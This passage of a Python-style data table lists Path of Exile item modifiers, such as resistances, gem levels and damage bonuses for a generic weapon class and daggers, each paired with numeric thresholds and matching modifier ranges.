"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '1.5% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '0.5% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '(5 - 10)% chance to gain a Frenzy Charge on Kill'), (100, '(5 - 10)% chance to gain a Power Charge on Kill')],
"#% reduced Soul Cost of Vaal Skills": [(25, 'Vaal Skills deal (25 - 30)% increased Damage'), (50, 'Vaal Skills deal (31 - 35)% increased Damage'), (100, '(40 - 50)% increased Attack Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(25 - 30) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(600, '(7 - 9)% increased Armour'), (1200, '(10 - 12)% increased Armour'), (5000, '(13 - 15)% increased Armour')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, 'Adds (1 - 2) to (3 - 4) Cold Damage to Attacks with this Weapon per 10 Dexterity')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(600, '(7 - 9)% increased Evasion Rating'), (1200, '(10 - 12)% increased Evasion Rating'), (5000, '(13 - 15)% increased Evasion Rating')],
"+# to Intelligence": [(40, '(6 - 8) to Intelligence'), (70, '(9 - 11) to Intelligence'), (100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, 'Adds 1 to (5 - 6) Lightning Damage to Attacks with this Weapon per 10 Intelligence')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Weapon range": [(7, '1 to Weapon range'), (20, '2 to Weapon range')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to maximum Mana": [(50, '(8 - 10) to maximum Mana'), (100, '(11 - 14) to maximum Mana'), (150, '(15 - 19) to maximum Mana'), (175, '(20 - 24) to maximum Mana'), (200, '(25 - 30) to maximum Mana'), (500, '(6 - 8)% increased Attack Damage per 500 Maximum Mana')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(40, '(15 - 17) to Global Critical Strike Multiplier'), (80, '(18 - 20) to Global Critical Strike Multiplier'), (150, '(21 - 23) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(200, 'Adds (4 - 9) to (11 - 21) Chaos Damage'), (320, 'Adds (10 - 18) to (22 - 34) Chaos Damage'), (1000, 'Adds (19 - 28) to (35 - 49) Chaos Damage')],
"Adds # to # Cold Damage": [(50, 'Adds (3 - 6) to (7 - 11) Cold Damage'), (100, 'Adds (7 - 10) to (12 - 18) Cold Damage'), (150, 'Adds (11 - 15) to (19 - 26) Cold Damage'), (200, 'Adds (16 - 20) to (27 - 35) Cold Damage'), (1000, 'Adds (21 - 25) to (36 - 43) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(60, 'Adds (3 - 5) to (5 - 8) Cold Damage to Spells'), (120, 'Adds (5 - 7) to (9 - 13) Cold Damage to Spells'), (160, 'Adds (8 - 11) to (14 - 19) Cold Damage to Spells'), (180, 'Adds (12 - 14) to (19 - 25) Cold Damage to Spells'), (1000, 'Adds (15 - 18) to (26 - 31) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(80, 'Adds (4 - 8) to (9 - 15) Fire Damage'), (160, 'Adds (9 - 12) to (16 - 23) Fire Damage'), (210, 'Adds (13 - 18) to (24 - 31) Fire Damage'), (250, 'Adds (19 - 24) to (32 - 43) Fire Damage'), (1000, 'Adds (25 - 30) to (44 - 53) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(75, 'Adds (3 - 6) to (7 - 11) Fire Damage to Spells'), (150, 'Adds (7 - 9) to (12 - 17) Fire Damage to Spells'), (200, 'Adds (10 - 13) to (17 - 22) Fire Damage to Spells'), (230, 'Adds (14 - 17) to (23 - 31) Fire Damage to Spells'), (1000, 'Adds (18 - 21) to (31 - 38) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(150, 'Adds 1 to (16 - 25) Lightning Damage'), (300, 'Adds (1 - 2) to (26 - 40) Lightning Damage'), (375, 'Adds (1 - 3) to (41 - 55) Lightning Damage'), (430, 'Adds (2 - 5) to (56 - 70) Lightning Damage'), (1000, 'Adds (2 - 6) to (71 - 83) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(100, 'Adds 1 to (12 - 18) Lightning Damage to Spells'), (200, 'Adds (1 - 2) to (19 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 39) Lightning Damage to Spells'), (370, 'Adds (2 - 4) to (40 - 49) Lightning Damage to Spells'), (1000, 'Adds (2 - 5) to (50 - 59) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(40, 'Adds 1 to 2 Physical Damage'), (80, 'Adds (2 - 3) to (3 - 4) Physical Damage'), (120, 'Adds (3 - 4) to (5 - 6) Physical Damage'), (135, 'Adds (5 - 6) to (7 - 8) Physical Damage'), (500, 'Adds (6 - 7) to (9 - 10) Physical Damage')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(15 - 17)% increased Chaos Damage'), (44, '(18 - 20)% increased Chaos Damage'), (100, '(21 - 23)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(17 - 19)% increased Elemental Damage'), (44, '(20 - 22)% increased Elemental Damage'), (100, '(23 - 26)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(3, 'You and Allies affected by your Aura Skills deal (7 - 9)% increased Damage'), (5, 'You and Allies affected by your Aura Skills deal (10 - 12)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (13 - 15)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(18 - 20)% increased Chaos Damage'), (22, '(21 - 23)% increased Chaos Damage'), (50, '(24 - 26)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(11, '(21 - 23)% increased Cold Damage'), (22, '(24 - 26)% increased Cold Damage'), (50, '(27 - 30)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(11, '(21 - 23)% increased Lightning Damage'), (22, '(24 - 26)% increased Lightning Damage'), (50, '(27 - 30)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Cold Damage'), (32, '(24 - 26)% increased Cold Damage'), (100, '(27 - 30)% increased Cold Damage\nGain (4 - 6)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Fire Damage'), (32, '(24 - 26)% increased Fire Damage'), (100, '(27 - 30)% increased Fire Damage\nGain (4 - 6)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Lightning Damage'), (32, '(24 - 26)% increased Lightning Damage'), (100, '(27 - 30)% increased Lightning Damage\nGain (4 - 6)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(5, '(15 - 17)% increased Chaos Damage'), (10, '(18 - 20)% increased Chaos Damage'), (50, '(21 - 23)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(16, '(19 - 22)% increased Global Physical Damage'), (32, '(23 - 26)% increased Global Physical Damage'), (100, '(27 - 30)% increased Global Physical Damage\nGain (4 - 6)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(44, '(23 - 26)% increased Attack Damage'), (88, '(27 - 30)% increased Attack Damage'), (200, '(31 - 35)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(44, '(23 - 26)% increased Spell Damage'), (88, '(27 - 30)% increased Spell Damage'), (200, '(31 - 35)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(15 - 17)% increased Chaos Damage'), (2, '(18 - 20)% increased Chaos Damage'), (10, '(21 - 23)% increased Chaos Damage')],
},
"Dagger": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Poison on Hit": [(50, '(14 - 18)% increased Damage with Poison'), (100, '(19 - 23)% increased Damage with Poison'), (300, '(24 - 28)% increased Damage with Poison\n(25 - 30)% chance to Poison on Hit')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (19 - 22)% increased Spell Damage'), (500, 'Triggered Spells deal (23 - 26)% increased Spell Damage')],
"#% chance to deal Double Damage": [(8, '2% chance to deal Double Damage'), (50, '3% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(40, '(23 - 26)% increased Attack Damage\n(23 - 26)% increased Spell Damage'), (100, '(27 - 30)% increased Attack Damage\n(27 - 30)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(22, '(3 - 4)% increased Attack Speed\n(5 - 6)% increased Cast Speed'), (50, '(5 - 6)% increased Attack Speed\n(7 - 9)% increased Cast Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(30, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% increased Cast Speed": [(40, '(5 - 6)% increased Cast Speed'), (65, '(7 - 9)% increased Cast Speed'), (200, '(10 - 12)% increased Cast Speed')],
"#% increased Chaos Damage": [(75, '(18 - 20)% increased Chaos Damage'), (150, '(21 - 23)% increased Chaos Damage'), (500, '(24 - 26)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(18 - 20)% increased Cold Damage'), (160, '(21 - 23)% increased Cold Damage'), (220, '(24 - 26)% increased Cold Damage'), (280, '(27 - 30)% increased Cold Damage'), (1000, '(10 - 15)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(10, '2% increased Damage per Endurance Charge'), (50, '(3 - 4)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(10, '2% increased Damage per Frenzy Charge'), (50, '(3 - 4)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(10, '2% increased Damage per Power Charge'), (50, '(3 - 4)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(70, '(15 - 18)% increased Damage'), (140, '(19 - 22)% increased Damage'), (500, '(23 - 26)% increased Damage')],
"#% increased Damage with Poison": [(45, '(14 - 18)% increased Damage with Poison'), (90, '(19 - 23)% increased Damage with Poison'), (200, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% increased Elemental Damage": [(70, '(17 - 19)% increased Elemental Damage'), (140, '(20 - 22)% increased Elemental Damage'), (500, '(23 - 26)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(18 - 20)% increased Fire Damage'), (160, '(21 - 23)% increased Fire Damage'), (220, '(24 - 26)% increased Fire Damage'), (280, '(27 - 30)% increased Fire Damage'), (1000, '(10 - 15)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 3% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(18 - 20)% increased Lightning Damage'), (160, '(21 - 23)% increased Lightning Damage'), (220, '(24 - 26)% increased Lightning Damage'), (280, '(27 - 30)% increased Lightning Damage'), (1000, '(10 - 15)% increased Conductivity Curse Effect')],
"#% increased Mana Regeneration Rate": [(50, '(16 - 18)% increased Mana Regeneration Rate'), (90, '(19 - 21)% increased Mana Regeneration Rate'), (130, '(22 - 24)% increased Mana Regeneration Rate'), (170, '(25 - 27)% increased Mana Regeneration Rate'), (190, '(28 - 30)% increased Mana Regeneration Rate'), (500, '(28 - 30)% increased Mana Regeneration Rate\n0.3% of Mana Regenerated per second')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Poison Duration": [(20, '(14 - 18)% increased Damage with Poison'), (40, '(19 - 23)% increased Damage with Poison'), (100, '(24 - 28)% increased Damage with Poison\n(8 - 12)% increased Poison Duration')],
"#% increased Spell Damage": [(90, '(16 - 18)% increased Spell Damage'), (180, '(19 - 22)% increased Spell Damage'), (270, '(23 - 26)% increased Spell Damage'), (300, '(31 - 35)% increased Spell Damage'), (1000, 'Spells have a (8 - 10)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(0.67, '(4 - 5)% increased maximum Energy Shield'), (1.33, '(6 - 7)% increased maximum Energy Shield'), (8.33, '(8 - 10)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.2% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '1.5% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '0.5% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '(5 - 10)% chance to gain a Frenzy Charge on Kill'), (100, '(5 - 10)% chance to gain a Power Charge on Kill')],
"#% reduced Soul Cost of Vaal Skills": [(25, 'Vaal Skills deal (25 - 30)% increased Damage'), (50, 'Vaal Skills deal (31 - 35)% increased Damage'), (100, '(40 - 50)% increased Attack Damage if Corrupted\n(40 - 50)% increased Spell Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(25 - 30) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(600, '(7 - 9)% increased Armour'), (1200, '(10 - 12)% increased Armour'), (5000, '(13 - 15)% increased Armour')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, 'Adds (1 - 2) to (3 - 4) Cold Damage to Attacks with this Weapon per 10 Dexterity'), (200, '1% increased Spell Damage per 16 Dexterity')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(600, '(7 - 9)% increased Evasion Rating'), (1200, '(10 - 12)% increased Evasion Rating'), (5000, '(13 - 15)% increased Evasion Rating')],
"+# to Intelligence": [(40, '(6 - 8) to Intelligence'), (70, '(9 - 11) to Intelligence'), (100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, 'Adds 1 to (5 - 6) Lightning Damage to Attacks with this Weapon per 10 Intelligence'), (200, '1% increased Spell Damage per 16 Intelligence')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Weapon range": [(7, '1 to Weapon range'), (20, '2 to Weapon range')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to maximum Mana": [(70, '(8 - 10) to maximum Mana'), (125, '(11 - 14) to maximum Mana'), (175, '(15 - 19) to maximum Mana'), (230, '(20 - 24) to maximum Mana'), (280, '(25 - 30) to maximum Mana'), (500, '(6 - 8)% increased Attack Damage per 500 Maximum Mana\n(6 - 8)% increased Spell Damage per 500 Maximum Mana')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(40, '(15 - 17) to Global Critical Strike Multiplier'), (80, '(18 - 20) to Global Critical Strike Multiplier'), (150, '(21 - 23) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
